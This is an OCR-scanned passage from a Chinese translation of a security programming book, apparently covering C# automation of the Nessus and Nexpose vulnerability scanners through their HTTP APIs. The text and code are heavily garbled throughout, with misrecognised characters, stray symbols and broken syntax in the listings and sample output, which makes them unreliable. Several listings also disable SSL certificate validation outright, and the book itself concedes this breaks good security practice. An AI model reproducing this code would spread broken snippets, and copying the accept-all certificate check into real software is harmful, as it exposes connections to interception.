using (Stream requestStream = request.GetRequestStream()) 
requestStream. @Write(bytes, 0, bytes.Length); 
} 


else 
request.ContentLength = 0; 


string response = string.Empty; 
try © 


using (StreamReader reader = new ©@StreamReader(request.GetResponse().GetResponseStream())) 
response = reader.ReadToEnd(); 


} 


catch 


{ 
return new JObject(); 


} 


if (string.IsNullOrEmpty(response)) 
return new JObject(); 
return JObject.@®@Parse(response); 


MakeRequest () 方法 有 两 个 必需 的 参数 (HTTP 和 URI) 和 两 个 可 选 的 参数 (JObject 和 认证 令 牌 ) 。 每 个 参数 的 默认 值 
为 null。 


要 创建 MakeRequest () ， 我 们 通过 组 合 host 和 第 二 个 参数 来 创建 API 调 用 @ 的 基本 URL。 然 后 使 用 HttpWebRequest 构 
建 HTTP 请 求 ， 并 将 HttpWebRequest MethodG@) 属 性 设置 为 传递 给 MakeRequest () 方法 的 method 变 量 的 值 。 接 下 来 ， 我 们 
测试 用 户 是 否 在 JObject 中 提供 了 一 个 身份 验证 令 牌 。 如 果 是 这 样 ， 将 HTTP 请 求 头 X-Cookie 赋 值 为 Nessus 将 在 我 们 进行 身份 验 
证 时 寻找 的 token 参 数 @。 将 HTTP 请 求 的 ContentType 属 性 @ 设 置 为 application/json， 以 确保 API 服 务 器 知道 如 何 处 理 人 在 请 求 
正文 中 发 送 的 数据 (否则 它 将 拒绝 接受 请 求 ) 。 


如 果 JObject 作 为 第 三 个 参数 @ 补 传递 给 MakeRequest () ， 则 使 用 GetBytes () @ 将 其 转换 为 字 节 数组 ， 因 为 Write () 
方法 只 能 写 入 字 节 。 我 们 将 ContentLength 属 性 设置 为 数组 的 大 小 ， 然 后 使 用 Write () 名 将 JSON 写 入 请 求 流 。 如 果 传 递 给 
MakeRequest () 的 JoObject 为 null， 那 么 我 们 只 需 将 ContentLength 赋 值 为 0 并 继续 ， 因 为 我 们 不 会 企 请 求 体 中 放置 任何 数 
据 。 


声明 一 个 空 字 符 串 来 保存 服务 器 的 响应 ， 开 始 一 个 try/catch@ 块 以 接收 回复 。 在 using 语 句 中 ,， 创建 一 个 StreamReader@) 


通过 将 服务 器 的 HTTP 响 应 流传 递 给 StreamReader 构 造 函 数 来 读 取 HTTP 响 应 ， 然 后 调用 ReadToEnd () 将 完整 的 响应 体 读 入 
我 们 的 空 字符 串 。 如 果 读 取 响 应 导致 异常 ， 那 么 可 以 预期 响应 体 是 空 的 ， 所 以 捕获 异常 并 将 空 JObject 返 回 给 ReadToEnd () 。 
否则 ， 将 响应 传递 给 Parse () @ 并 返回 生成 的 JObject。 


5.2.2 ”注销 和 清理 


要 完成 NessusSession 类 ， 我 们 将 创建 LogOut () 以 将 我 们 从 服务 器 中 注销 ， 并 使 用 Dispose () 来 实现 IDisposable 接 
口 ， 如 清单 5-3 所 示 。 


清单 5-3: NessusSession 类 的 最 后 两 个 方法 ， 以 及 Host、Authenticated 和 Token 属 性 


public void @LogOut() 


{ 
if (this.Authenticated) 


L 
MakeRequest("DELETE", "/session", null, this.Token); 


this.Authenticated = false; 


} 


} 
public void @Dispose() 


{ 
if (this.Authenticated) 


this.LogOut(); 
} 


public string Host { get; set; } 
public bool Authenticated { get; private set; } 
public string Token { get; private set; } 


LogOut () 方法 @ 测 试 我 们 是 否 使 用 Nessus 服 务 器 进行 身份 验证 。 如 果 是 这 样 ， 则 通过 传递 DELETE 作 为 HTTP 方 
法 ，/session 作 为 URI， 并 向 Nessus 服 务 器 发 送 DELETE HTTP 请 求 以 注销 的 认证 令 牌 来 调用 MakeRequest () 。 请 求 完成 后 ， 
我 们 将 Authenticated 属 性 设置 为 false。 为 了 实现 IDisposable 接 口 ， 我 们 创建 了 Dispose () @， 如 果 我 们 被 认证 ， 则 注销 。 


5.2.3 ”测试 NessusSession 类 


我 们 可 以 使 用 一 个 简单 的 Main () 方法 测试 NessusSession 类 ， 如 清单 5-4 所 示 。 
清单 5-4: 测试 NessusSession 类 以 使 用 NessusManager 进 行 身份 验证 


public static void @Main(string[ | args ) 
{ 


@using (NessusSession session = new @NessusSession("192.168.1.14", "admin", "password")) 


Console. @WritelLine("Your authentication token is: ”+ session.Token); 


} 
} 


在 Main () 方法 中 ,创建 一 个 新 的 NessusSession@ 并 传递 Nessus 主 机 的 IP 地 址 、 用 户 名 和 Nessus 密 码 作 为 参数 。 通 过 
认证 会 话 ， 打 印 Nessus 成 功 认 证 之 后 给 我 们 的 身份 验证 令 牌 四 ， 然 后 退出 。 


注意 : NessusSession 是 在 using 语 多 的 上 下 文中 创建 的 @)， 此 在 NessusSession 类 中 实现 的 Dispose () 方法 将 在 using 块 结束 时 


自动 调用 。 这 会 注销 NessusSession， 使 Nessus 给 出 的 认证 令 牌 无 效 。 
运行 此 代码 应 打印 类 似 于 清单 5-5 中 的 身份 验证 令 牌 。 
清单 5-5: 运行 NessusSession 测 试 代码 来 打印 身份 验证 令 牌 


$ mono ./ch5 automating nessus.exe 
Your authentication token is: 19daad2f2fca99b2a2d48febb2424966a99727c19252966a 
$ 


5.3 ”NessusManager 类 


清单 5-6 显 示 了 我 们 在 NessusManager 类 中 需要 实现 的 方法 ， 它 将 Nessus 的 公共 API 调 用 和 功能 包装 成 我 们 稍 后 使 用 的 简 
单 易 用 的 方法 。 


清单 5-6: NessusManager 类 


public class NessusManager : @IDisposable 
NessusSession session; 
public NessusManager(NessusSession session) 


{ 


_session = @session; 


} 


public JObject GetScanPolicies() 
{ 


return session.@MakeRequest("GET", "/editor/policy/templates", null, session.Token); 


} 


public JObject CreateScan(string policyID, string cidr, string name, string description) 
{ 

JObject data = @new JObject(); 

data[ "uuid"] = policyID; 

data[ "settings"| = new JObject(); 

datal "settings" |["name"|] = name; 

data["settings"|["text targets"|] = cidr; 

data["settings" |]["description"] = description; 


return session.@MakeRequest("POST", "/scans", data, session.Token); 


} 

public JObject StartScan(int scanID ) 

return session.MakeRequest("POST", "/scans/" + ScanID + "/launch", null, session.Token); 
} 

public JObject @GetScan(int scanID ) 

| return session.MakeRequest("GET", "/scans/" + scanID, null, session.Token); 

} 

public void Dispose() 

| if ( session.Authenticated) 


_session.@LogOut(); 


_session = null; 
} 
} 


NessusManager 类 实现 了 IDisposable@@， 以 便 我 们 可 以 使 用 NessusSession 与 NessusAPI 进 行 交 互 ， 并 在 必要 时 自动 注 
销 。NessusManager 构 造 消 数 授 受 NessusSession 一 个 参数 ， 并 将 其 分 配给 NessusManager 中 的 任何 方法 都 可 以 访问 的 私有 


_session 变 量 Q@)。 


Nessus 了 预先 配置 了 几 种 不 同 的 扫描 策略 。 我 们 将 使 用 GetScanPolicies () 和 Make-Request () @ 对 这 些 策略 进行 排序 ， 
以 从 /editor/policy/templates URI 中 检索 策略 列表 及 其 lID。CreateScan () 的 第 一 个 参数 是 扫描 策略 ID， 第 二 个 参数 是 要 扫 
描 的 CIDR 范 围 。 (你 也 可 以 在 此 参数 中 输入 新 行 分 隔 的 IP 地 址 字符 串 。) 


第 三 个 参数 和 第 四 个 参数 可 以 分 别 用 于 保存 扫描 的 名 称 和 摘 述 。 我 们 将 为 每 个 名 称 使 用 唯一 的 Guid (全 局 唯一 的 ID， 字 和 母 
和 数字 组 成 的 唯一 的 字符 串 ) ， 因 为 我 们 的 扫描 仅 用 于 测试 目的 ， 但 是 当 你 构建 更 复杂 的 目 动 化 任务 时 ， 你 可 能 需要 采用 一 套 合 
名 的 扫 摘 系 统 以 使 其 更 容易 跟 蹊 。 我 们 使 用 传递 给 Createscan () 的 参数 来 创建 一 个 新 的 JoObject@， 其 中 包含 要 创建 的 扫 摘 的 
设置 。 然 后 ， 我 们 将 此 JObject 传 递 给 MakeRequest () @@， 马 将 向 /scans URI 友 送 POST 请 求 并 返回 有 关 特 定 扫 摘 的 所 有 相 天 


信息 ， 显 示 我 们 已 成 功 创建 (但 未 局 动 ) 的 扫 拉 。 可 以 使 用 扫 摘 ID 来 报告 扫 摘 的 状态 。 
使 用 CreateScan () 创建 扫 拉 之 后 将 其 ID 传递 给 StartScan () 方法 ， 访 方法 将 为 URI/scans/<scanlD>/launch 创 建 POST 


请 求 并 返回 JSON 响 应 ， 告 诉 我 们 扫描 是 否 启动 。 我 们 可 以 使 用 GetScan () @ 来 监视 扫描 。 


要 完成 NessusManager， 我 们 实现 Dispose () 注销 会 话 @， 然 后 通过 将 _ session 变量 设置 为 null 来 进行 清理 。 


5.4 ”启动 Nessus 扫 描 


清单 5-7 显 示 了 如 何 使 用 NessusSession 和 NessusManager 来 运行 扫 拉 并 打印 绪 


清单 -7: 检索 扫 摘 委 略 列表 以 便 我 们 可 以 使 用 正确 的 扫 摘 妥 略 局 动 扫 摘 


public static void Main(string[ | args ) 


{ 


ServicePointManager.@ServerCertificateValidationCallback = 
(Object obj, X509Certificate certificate, X509Chain chain, SslPolicyErrors errors) => true 


Using (NessusSession session = @new NessusSession("192.168.1.14", "admin", "password")) 
using (NessusManager manager = new NessusManager(session)) 


JObject policies = manager.@GetScanPpolicies(); 
string discoveryPolicyID = string.Empty; 
foreach (JObject template in policies["templates"]) 


if (template [ "name"].Value<string>() == @"basic") 
discoveryPolicyID = template ["uvuid"|.Valuex<string>(); 


我 们 通过 分 配 一 个 仪 返回 true 开 ServerCertificateValidationCallbackQ@ 的 匿名 方法 禁用 SSL 证 书 验 证 来 开始 自动 化 (因为 
Nessus 服 务 器 的 SSL 密 钥 是 目 签名 的 ， 它 们 将 验证 失败 ) ， 这 个 回调 是 HTTP 网 络 库 用 来 验证 SSL 证 书 的 。 简 单 地 返回 true 使 得 任 
何 SSL 证 书 都 被 接受 。 接 下 来 ， 我 们 创建 一 个 NessusSession@ 并 传递 Nessus 服 务 器 的 IP 地 址 以 及 Nessus API 的 用 尸 名 和 密码 。 
如 果 认 证 成 功 ， 我 们 将 新 会 话 传递 给 另 一 个 Nessus-Manager。 


获得 一 个 认证 的 会 话 和 一 个 NessusManager 之 后 ， 我 们 可 以 开始 与 Nessus 服 务 器 进行 交互 。 通 过 GetScanPolicies () @ 
获取 可 用 的 扫 拉 策略 的 列表 ， 然 后 使 用 string.Empty 创 建 一 个 空 字 符 串 以 保存 基本 扫描 策略 的 扫描 策略 ID， 并 遍 历 扫 摘 策略 模 
板 。 当 我 们 亿 历 扫 摘 策略 时 ， 我 们 检查 当前 扫 摘 策略 的 名 称 是 否 等 于 字符 串 basic@， 这 样 的 扫描 策略 允许 我 们 对 网 络 上 的 主机 
执行 一 组 未 经 身份 验证 的 检查 。 我 们 和 存储 基本 扫 拉 策略 的 ID 以 供 将 来 使 用 。 


现在 ,使 用 基本 扫描 策略 ID 创建 并 启动 扫 摘 ， 如 清单 5-8 所 示 。 


清单 5-8: Nessus 自 动 化 中 Main () 方法 的 后 半 部 分 


JObject scan = manager.@CreateScan(discoveryPolicyID, "192.168.1.31", 
"Network Scan", "A simple scan of a single IP address."); 

int scanID = @scan["scan"|["id"|].Value<int>(); 

manager.@StartScan(scanID); 

JObject scanStatus = manager.GetScan(scanID); 


while (scanStatus["info"|["status"|].Value<string>() != @"completed") 
{ 
Console.WritelLine("Scan status: 
["status"].Value<string>()); 
Thread.Sleep(5000); 
scanStatus = manager.@GCetScan(scanID); 


} 


+ scanStatus["info"| 


foreach (JObject vuln in scanStatus["vulnerabilities"|]) 
Console.WritelLine(vuln.ToString()); 


在 @ 处 我 们 调用 CreateScan() 传递 策略 ID、1P 地 址 、 名 称 和 方法 的 描述 ， 并 将 其 响应 存储 在 JObject 中 。 然 后 我 们 将 扫 搞 
ID 从 JObject 中 取出 @@， 以 便 可 以 将 扫 摘 ID 传 递 给 Startscan () @ 来 司 动 扫描。 


我 们 使 用 GetScan () 通过 传递 扫 摘 ID 来 监视 扫描， 将 结果 仓储 在 JObject 中 ， 并 使 用 while 循 环 来 持续 检查 当前 的 扫 摘 是 否 
已 经 完成 。 如 果 扫 摘 疝 未 完成 @， 我 们 会 打印 其 状态 ， 睡 眠 ? 秒 ， 并 再 次 调用 Getscan () @@。 循 环 将 会 重复 直到 扫 摘 报告 完 
成 ， 此 时 我 们 和 迭代 并 打 EDGetScan () 在 foreach 循 环 中 返回 的 每 个 漏洞 ， 看 起 来 这 可 能 像 清单 -9。 根 据 你 的 计算 机 运行 速度 
和 网 速 ， 扫 摘 可 能 需要 几 分 钟 才 能 完成 。 


清单 5-9: 使 用 Nessus 漏 洞 扫 朱 程 序 进 行 目 动 扫 摘 的 部 分 输出 


$ mono ch5 automating nessus.exe 
Scan status: running 
Scan status: running 
Scan status: running 
--SN1ip-- 
{ 
"count": 1， 
"plugin name": @'SSL Version 2 and 3 Protocol Detection ， 
"vuln index : 62， 
“severity : 2， 
“plugin id : 20007， 
"severity index : 30， 
“plugin family : “Service detection 


“Count : 1， 

plugin_name : @ SSL Self-Signed Cettificate ， 
Vuln index : 61， 

“severity': 2， 

"plugin id : 57582， 

“severity index : 31， 

plugin _ family : “eneral 


"count": 1， 

"plugin name : “SSL Certificate Cannot Be Tiusted ， 
"vuln index : 56， 

severity : 2， 

“plugin id : 51192， 

“severity index : 32， 

"plugin family : “General" 


扫描 结果 告诉 我 们 ， 目 标 在 开放 端口 @ 上 使 用 弱 SSL 模 式 (协议 2 和 协议 3) 和 自 签名 SSL 证 书 。 现 在 我 们 可 以 确保 服务 器 
的 SSL 配 置 正在 使 用 完全 最 新 SSL 模 式 ， 然 后 禁用 弱 模 式 (或 完全 禁用 服务 ) 。 之 后 可 以 重新 运行 我 们 的 自动 扫描 程序 ， 以 确保 
Nessus 不 再 报告 任何 使 用 中 的 弱 SSL 模 式 。 


5.5 ”本章 小 结 


本 章 展示 了 如 何 自动 执行 Nessus API 以 完成 对 网 络 连 接 设备 的 未 经 身份 验证 的 扫 摘 。 为 了 实现 这 一 点 ， 我 们 需要 能 够 向 
Nessus HTTP 服 务 器 发 送 API 请 求 。 为 此 ， 我 们 创建 了 Nessus9S9ession 类 ， 与 Nessus 进 行 身 份 验 证 之 后 ， 我 们 创建 了 
NessusManager 类 来 创建 、 运 行 和 报告 扫 摘 结果。 我 们 使 用 这 些 类 的 代码 来 包 半 所 有 内 容 ， 根 据 用 户 提 供 的 信息 自动 调用 
Nessus APl, 


这 不 是 Nessus 提 供 的 功能 的 范围 ， 你 将 企 Nessus API 文 档 中 找到 更 多 详细 信息 。 许 多 组 织 需 要 对 网 络 上 的 主机 执行 身份 验 
证 的 扫 搞 ， 以 获得 完整 的 补丁 程序 列表 确定 主机 的 健康 状况 。 升 级 我 们 的 目 动 化 程序 来 处 理 此 问题 将 是 一 个 很 好 的 练习 。 


第 6 章 ”自动 化 运行 Nexpose 


Nexpose 是 一 个 与 Nessus 类 似 的 漏洞 扫 拉 器 ， 不 过 Nexpose 更 专注 于 企业 级 漏洞 管理 。 这 融 意 味 着 ，Nexpose 不 仪 能 帮助 
系统 管理 员 上 友 现 哪些 系统 需要 安 半 补丁 ， 还 能 帮助 他 们 确定 在 某 段 时 间 内 潜在 漏洞 处 理 的 优先 级 ， 从 而 减少 漏洞 的 影响 。 本 章 将 
介绍 如 何 用 C# 自 动 调用 Rapid7 出 品 的 Nexpose 漏 洞 扫描 器 ， 以 便 创 建 一 个 Nexpose 站 点 ， 对 该 站 点 进行 扫 摘 ， 创 建 一 个 PDF 格 
式 的 站 点 漏洞 报告 并 在 最 后 删除 该 站 点 。Nexpose 的 报告 功能 非常 强大 灵活 ， 人 允许 用 户 自动 化 地 创建 针对 从 高 管 到 技术 管理 员 
等 不 同 用 户 群 体 的 报告 。 


与 第 5 章 提 到 的 Nessus 扫 描 器 一 样 ，Nexpose 使 用 HTTP 协 议 来 开放 其 API 接 口 ， 但 Nexpose 用 XML 格 式 而 不 是 JSON 格 式 来 
格式 化 数据 。 与 第 5 章 介 绍 的 一 样 ， 我 们 将 编写 两 个 独立 的 类 : 一 个 用 于 和 Nexpose APl 通 信 (会 话 类 ) ， 另 外 一 个 用 来 调用 
API (管理 器 类 ) 。 在 编写 完 这 些 类 后 ， 就 会 知道 如 何 启动 扫描 并 查看 扫描 的 结果 。 


6.1 安 汉 Nexpose 


可 从 Rapid7 获 取 不 同形 式 和 版 本 的 Nexpose。 这 里 我 们 用 如 清单 6-1 所 示 的 命令 和 URL 从 Rapid7 获 取 Nexpose 的 二 进 制 安 
装 版 ， 将 其 安装 到 一 台 刚 安装 Ubuntu 14.04LTS 的 机 器 上 。 每 当 Nexpose 发 布 新 版 本 ， 清 单 里 面 所 用 的 URL 都 会 用 最 新 的 安装 
程序 予以 更 新 。 不 管 什 么 原因 如 果 上 述 URL 无 法 正常 访问 ， 都 可 先 注册 得 到 一 个 Community 激 ) 笑 码 (这 是 运行 Nexpose 所 必需 


的 ) ， 然 后 得 到 一 个 下 载 链 接 。 完 成 安 准 程序 下 载 后 ， 需 要 将 文件 的 权限 设置 为 可 执行 ， 从 而 后 续 可 以 root 权 限 运行 该 安装 程 
序 。 


清单 6-1: 下 载 及 安装 Nexpose 


$ wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin 
$ chmod +x ./NeXposeSetup-Linux64.bin 
$ sudo ./NeXposeSetup-Linux64.bin 


如 图 6-1 所 示 ， 如 果 在 诸如 KDE 或 GNOME 之 类 的 图 形 化 桌面 环境 中 运行 安 濠 程序， 用 户 束 可 用 所 提供 的 图 形 化 安 六 程序 来 
完成 初始 化 配置 。 如 果 在 诸如 SSH 之 类 的 基于 文本 的 环境 中 安 闪 Nexpose， 安 北 程 序 束 通过 一 些 需要 用 yes/no 回 答 的 问题 以 及 


其 他 提示 信息 来 逐步 完成 整个 配置 。 


OS Installer - Nexpose 


Nexpose Welcome to the Nexpose Installation Wizard 


Rapidy Nexpose identifies vulnerabilities in networks, operating systems, 
databases, programs, and Web applications. Prioritizing these vulnerabilities 
。 Welcome with exploit risk scoring and asset criticality ratings, Nexpose helps your 


| organization reduce risk exposure and remediation costs. 
License agreement 


Type and destination Rapid?, LLC 


System check http: /Iwww rapid? com 
a info®@rapid?.com 

cab +1.866.772.7437 

Database port +1.617.247.1717 


Account details 
shortcut location 
Confirm selections 
Installation progress 
Initialization 

Console details 


Installation success 


RAPIDT) 


图 6-1 图 形 化 的 Nexpose 安 装 程序 


Nexpose 安 六 完成 以 后 ， 可 在 终端 中 运行 ifconfig 命 令 来 查看 要 在 Web 浏 晚 器 中 打开 的 iP 地址 。 然 后 在 浏览 器 输 
入 https://ip:3780， 注 意 要 用 运行 Nexpose 的 计算 机 的 iP 地址 替换 这 里 的 ip。 随 后 应 该 能 看 到 如 图 6-2 所 示 的 Nexpose 登 录 页 
面 。 


使 用 在 安 六 过 程 中 要 求 输入 的 认证 信息 登录 。 在 登录 页 面 显示 前 你 有 可 能 会 看 到 一 个 SSL 证 书 错误 ， 这 是 因为 在 默认 情况 下 
Nexpose 使 用 的 是 自 签 名 SSL 证 书 ， 你 的 浏览 器 很 可 能 不 信任 该 证 书 ， 因 此 会 有 提醒 。 这 是 正常 的 ， 也 是 意料 之 中 的 事情 。 


Logonto Nexpose x 


一 C | 区 htps://192.168.1.197:3780jloginjsp 


图 6-2 ”Nexpose 登 孙 页 面 


6.1.1 油 尖 与 测 弃 


如 图 6-3 所 示 ， 在 第 一 次 登录 时 ， 程 序 将 提示 你 输入 激活 码 (这 个 激活 码 是 在 完成 社区 版 (Community Edition) 注册 之 
后 ，Rapid7 通 过 邮件 发 给 你 的 ) 。 


Activate License 


automatically over the Intermet, use a product key. If you do not have a key 


52 You need an active license for scanning and reporting. To activate 
[regqUest ONe. 


Enter a product key: 


Use a license file 稳 


图 6-3 Nexpose 弹 出 的 激活 对 话 框 


现在 测试 一 下 安装 情况 ， 确 认 已 正确 激活 Nexpose， 并 且 能 通过 发 送 HTTP 请 求 通过 Nexpose APIl 认 证 。 可 用 curl 工 具 发 起 
对 API 的 认证 请 求 并 显示 响应 情况 ， 如 清单 6-2 所 示 。 


清单 6-2: 用 curl 成 功 完成 与 Nexpose API 的 认证 


$ curl -d 《LoginRequest User-Iid= nxadmin ”password= nxpassword /> -X POST -k \ 
-H “Content-Type: text/xml" https://192.168.1.197:3780/api/1.1/xml 
<LoginResponse success="1" session-id="D45FFD388D8520F5FE18CACAA66BE527C1AF5888"/> 


$ 


如 果 响 应 中 包含 success="1" 和 一 个 会 话 I[D， 那 么 就 说 明 认 证 信息 通过 ，Nexpose 已 正常 激活 ，APl 也 正如 预期 的 那样 正常 
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运 们 。 


6.1.2 一些 Nexposej 澡 ; 


在 进一步 讨论 Nexpose 漏 洞 扫描 管理 和 报告 之 前 ， 需 要 定义 两 个 术语 。 在 Nexpose 中 局 动 漏洞 扫 摘 时， 你 扫描 的 是 一 个 站 
点 (site) ， 站 点 是 相关 主机 或 资产 (asset) 的 集合 。 


Nexpose 有 两 种 类 型 的 站 点 : 静态 站 点 和 动态 站 点 ， 在 自动 化 调用 Nexpose 扫 描 中 主要 关注 前 者 。 衣 人 态 站 点 包含 一 个 主机 
列表 ， 只 能 通过 重新 配置 站 点 改变 该 主机 列表 。 这 正 是 我 们 称 之 为 静态 的 原因 一 一 站 点 不 会 随 着 时 间 而 改变 。Nexpose 还 支持 
基于 俊 产 过 滤器 创建 站 操 ， 因 此 在 动态 站 点 中 的 资产 可 基于 漏洞 数量 或 无 法 认证 的 情况 在 一 公 两 周 内 友 生 变化 。 动 态 站 后 较 为 复 
杂 ， 但 相对 于 静态 站 点 而 言 ， 动 态 站 点 的 功能 更 为 强大 ， 对 于 动态 站 点 功能 的 了 解 作为 本 章 的 课外 作业 。 


组 成 站 点 的 资产 只 是 一 些 连接 到 网 络 中 Nexpose 可 与 之 通信 的 设备 ， 这 些 资产 可 以 是 数据 中 心 的 机 架 式 服务 器 、VMware 
ESXi 主 机 ， 也 可 以 是 Amazon AWS 实 例 。 如 果 能 用 IP 地 址 ping， 那 么 这 些 设备 就 可 以 成 为 Nexpose 站 点 中 的 一 个 资产 。 在 很 多 
情况 下 ， 将 物理 网 络 里 面 的 那些 主机 分 隔 成 Nexpose 中 的 逻辑 站 点 是 有 好 处 的 ， 这 样 有 助 于 更 精细 地 扫描 和 管理 漏洞 。 复 杂 的 
企业 网 络 可 能 会 有 一 个 专门 用 于 ESXi 主 机 的 站 点 ， 一 个 C 级 别 的 行政 网 段 ， 以 及 一 个 用 于 客户 服务 呼叫 中 心 资 产 的 站 点 。 


6.2 NexposeSession 类 


我 们 首先 从 编写 与 Nexpose API 通 信 的 Nexpose9ession 类 开始 ， 如 清单 6-3 所 示 。 
清单 6-3: NexposeSession 类 包 全 构造 函数 和 属性 的 开始 部 分 
public class NexposeSession : IDisposable 


public @NexposeSession(string username, string password, string host, 
int port = @3780, NexposeAPIVersion version = @NexposeAPIVersion.v11) 


{ 
this.@Host = host; 


this.Port = port; 
this.APIVersion = version; 


ServicePointManager.@ServerCertificateValidationCallback = (s, cert, chain, ssl) => true; 


this.@Authenticate(username, password); 


} 


public string Host { get; set; } 

public int Port { get; set; } 

public bool IsAuthenticated { get; set; } 

public string SessionID { get; set; } 

public NexposeAPIVersion APIVersion { get; set; } 


NexposeSession 类 的 构造 水 数 @O 有 五 个 参数 : 其 中 三 个 是 必需 的 〈 即 用 户 名 、 密 码 和 要 连接 的 主机 ) ， 另 外 两 个 是 可 选 的 
( 痛 口 号 和 API 版 本 ， 默 认 情 况 下 问 口 号 为 3780@，API 版 本 为 NexposeAPIVesion.v11G@) 。 首 先 在 @ 处 ， 将 三 个 必需 参数 的 
值 赋 给 Host、Port 以 及 APIVersion 属 性 。 接 着 在 @ 处 ， 通 过 将 ServerCertificateValidationCallback 设 置 为 总 是 返回 true 来 禁用 
SSL 证 书 验证 。 我 们 之 所 以 要 禁用 验证 是 因为 在 默认 情况 下 Nexpose 运 行 在 使 用 自 签名 证 书 的 HTTPS 上 (如 果 不 这 样 做 ， 则 在 
HTTP 请 求 过 程 中 SSL 证 书 验证 将 会 失败 ) ， 但 这 样 做 违背 了 良好 的 安全 准则 。 


如 清单 6-4 进 一 步 扩 展 所 示 ， 在 @@ 处 ， 尝 试 通过 调用 Authenticate () 方法 来 验证 用 户 身份 。 


清单 6-4: NexposeSession 类 的 Authenticate () 方法 


public XDocument @Authenticate(string username, string password) 


{ 


XDocument cmd = new @XDocument( 
new XElement("LoginRequest", 
new XAttribute("user-id", username), 
new XAttribute("password", password))); 


XDocument doc = (XDocument)this.®@ExecuteCommand(cmd); 


@if (doc.Root.Attribute("success").Value == "1") 
L 


©@this.SessionID = doc.Root.Attribute("session-id").Value; 
this.IsAuthenticated = true; 


} 


else 
throw new Exception("Authentication failed"); 


@return doc ; 


} 


Authenticate () 方法 @ 有 两 个 参数 ， 一 个 是 用 尸 名 ， 另 外 一 个 是 密码 。 为 了 将 用 户 名 和 密码 友 送 给 AP|I 来 进行 认证 ， 在 @ 
处 创建 了 一 个 XDocument 对 象 ， 设 对 象 有 一 个 LoginRequest 根 节点 ， 以 及 user-id 和 password 两 个 属性 。 将 创建 的 
XDocument 对 象 传 给 ExecuteCommand () 方法 @， 随 后 保存 Nexpose 服 务 器 返回 的 结果 ，。 


在 @ 处 ， 要 判断 一 下 Nexpose 的 XML 响 应 的 success 属 性 值 是 否 为 1。 如 果 为 1， 在 上 ， 葡 将 响应 中 的 session-id 值 赋 给 
Session1D 属 性 ， 将 ISAuthenticated 设 置 为 true。 最 后 ， 返 回 该 XML 响应 (6)。 


6.2.1 ExecuteCommand () 方法 


如 清单 6-5 所 示 ，ExecuteCommand () 方法 是 NexposeSession 类 的 关键 部 分 。 


清单 6-5: NexposeSession 类 ExecuteCommand () 方法 的 起 始 部 分 


public object ExecuteCommand(XDocument commandXm]l) 
{ 
string uri = string.Empty; 
switch (this.@APIVersion) 
{ 
case NexposeAPIVersion.v11: 
uri = /api/1.1/xml; 
break; 
case NexposeAPIVersion.v12: 
Uri = /api/1.2/xml'; 
break; 
default: 
throw new Exception("Unknown API version."); 


bl 


在 向 Nexpose 发 送 数据 之 前 ， 我 们 需要 知道 API 使 用 的 是 何 版 本 ， 所 以 在 处 ， 使 用 switch/case 代 码 段 (与 一 系列 的 if 语 句 


效果 类 似 ) 来 验证 APIVersion 的 值 。 例 如 ， 如 果 该 值 是 NexposeAPIVersion.v11 或 NexposeAPIVersion.v12 就 说 明 我 们 要 使 用 
版 本 为 1.1 或 1.2 的 API URI。 


发 起 对 Nexpose API 的 HTTP 请 求 
确定 了 发 起 API 请 求 使 用 的 URI 之 后 ， 束 可 同 Nexpose 发 送 XML 格 式 的 请 求 数据 了 ， 如 清单 6-6 所 示 。 


清单 6-6: 在 ExecuteCommand () 方法 中 通过 HTTP 向 Nexpose 发 送 XML 格 式 命令 


byte[ ] byteArray = Encoding.ASCII.GetBytes(commandXm1.ToStTring() ) 
@ HttpWebRequest request = WebRequest.Create("https://" + this.Host 


+ ":" + this.Port.ToString() + uri) as HttpWebRequest ; 
request.Method = @ POST'; 
request .ContentType = 四 text/xm] ; 
request.ContentLength = byteArray.Length; 
using (Stream dataStream = request.GetRequestStream()) 
dataStream. @Write(byteArray, 0, byteArray.Length); 


与 Nexpose HTTP API 的 通信 分 为 两 部 分 。 首 先 ，Nexpose 友 起 APl 请 求 ， 由 请 求 中 的 XML 格 式 数 据 知 晓 要 执行 的 命令 ; 然 
后 ， 读 取 该 API 请 求 的 响应 结果 。 为 了 向 Nexpose API 友 起 一 个 真实 的 HTTP 请 求 ， 我 们 创建 了 一 个 HttpWebRequest 对 象 @， 
并 将 其 Method 属 性 设 为 POST©@， 将 ContentType 属 性 设 为 text/xml@)， 将 ContentLength 属 性 设 为 XML 数 据 的 长 度 。 然 后 ， 
用 Write () 方法 @ 将 API XML 命 令 字 节 写 到 友 送 给 Nexpose 的 HTTP 请 求 字 节 流 中 。Nexpose 解 析 XML， 确 定 要 做 什么 ， 随 后 
在 响应 中 返回 结果 ，。 


MONO 中 的 TLS 


在 写本 书 的 时 候 ，Mono 中 的 TLS 状 态 是 在 不 断 变 化 的 。 对 于 TLS 2.1.1 和 v1.2 的 支持 已 编写 完成 ,但 目前 默认 情况 下 未 安装 。 
正 因 为 如 此 ，HTTP 库 可 能 不 能 发 起 HTTPS 请 求 ， 只 能 输出 一 个 认证 失败 的 模糊 异常 。 如 果 出 现 这 种 情况 ， 是 因为 Nexpose 只 允 
许 TLS v1.1 或 v1.2 连 接 ， 而 Mono 只 能 支持 v1.0。 要 在 测试 中 规避 这 种 情况 ， 只 需 增 加 一 行 代码 强制 Mono 通 过 Burp Suite (在 第 2 章 
中 用 过 的 一 个 工具 ) 代理 来 连接 。 


要 实现 这 个 目的 ， 只 需 将 清单 6-6 中 的 代码 修改 为 清单 6-7 的 代码 即 可 。 
清单 6-7: 设置 用 于 TLS 的 代理 服务 器 
request.Method = POST ; 


request.Proxy = new @WebProxy("127.0.0.1:8080"); 
request.ContentType = text/xml ; 


增加 一 行 代码 来 设置 请 求 的 Proxy 属 性 ， 将 代理 指向 监听 的 Burp suite 代 理 服 务 器 。Burp Suite 将 进行 恰当 的 居间 协调 ， 使 用 
TLS v1.0 与 Mono 客 户 端 连接 ， 使 用 TLS v1.1/1.2 与 Nexpose 服 务 器 连接 。 当 TLS 问 题解 决 之 后 (希望 能 在 不 久 的 将 来 予以 解决 ) 就 
没有 这 些 阻 碍 ， 本 书 中 的 代码 即 可 跨 平 台 运 行 。 


读 取 从 Nexpose API 返 回 的 HTTP 响 应 


接 下 来 ， 需 要 读 取 之 前 发 起 的 API 请 求 后 返回 的 HTTP 响 应 。 如 清单 6-8 所 示 ， 这 里 我 们 完成 ExecuteCommand () 方法 ， 
在 该 方法 中 ， 读 取 Nexpose 返 回 的 HTTP 响 应 ， 然 后 根据 HTTP 响 应 的 内 容 类 型 返回 一 个 XDocument 对 象 或 者 一 个 原始 字 书 数 
